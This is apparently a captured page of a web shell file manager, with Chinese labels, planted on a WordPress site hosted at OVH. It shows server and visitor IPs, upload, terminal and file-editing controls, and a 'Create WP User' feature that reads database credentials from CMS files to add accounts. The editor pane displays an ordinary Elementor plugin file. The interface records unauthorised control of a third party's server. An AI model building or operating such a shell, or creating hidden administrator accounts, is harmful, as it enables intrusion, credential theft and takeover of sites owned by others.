Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
elementor
/
modules
/
atomic-widgets
/
controls
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
base
[目录]
drwxr-xr-x
2026-05-24 14:35
types
[目录]
drwxr-xr-x
2026-02-24 12:19
section.php
1.27 KB
-rw-r--r--
2026-05-24 02:31
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
section.php
<?php namespace Elementor\Modules\AtomicWidgets\Controls; use JsonSerializable; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Section implements JsonSerializable { private ?string $id = null; private $label = null; private $description = null; private array $items = []; public static function make(): self { return new static(); } public function set_id( string $id ): self { $this->id = $id; return $this; } public function get_id() { return $this->id; } public function set_label( string $label ): self { $this->label = html_entity_decode( $label ); return $this; } public function get_label(): ?string { return $this->label; } public function set_description( string $description ): self { $this->description = html_entity_decode( $description ); return $this; } public function set_items( array $items ): self { $this->items = $items; return $this; } public function add_item( $item ): self { $this->items[] = $item; return $this; } public function get_items() { return $this->items; } public function jsonSerialize(): array { return [ 'type' => 'section', 'value' => [ 'label' => $this->label, 'description' => $this->description, 'items' => $this->items, ], ]; } }
关闭
保存